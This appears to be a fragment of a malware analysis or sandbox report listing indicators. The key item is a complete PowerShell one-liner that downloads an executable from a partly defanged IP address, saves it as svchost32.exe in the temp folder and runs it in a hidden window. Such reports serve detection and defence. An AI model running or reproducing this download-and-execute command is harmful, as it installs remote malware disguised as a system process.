Technical Information
- http://18#.#89.58.222/bamm.exe as %temp%\svchost32.exe
- '18#.#89.58.222':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-Object System.Net.WebClient).DownloadFile('http://18#.#89.58.222/bamm.exe','%TEMP%\svchost32.exe');Start-Process '%TEMP%\svchost32.exe'' (with hidden window)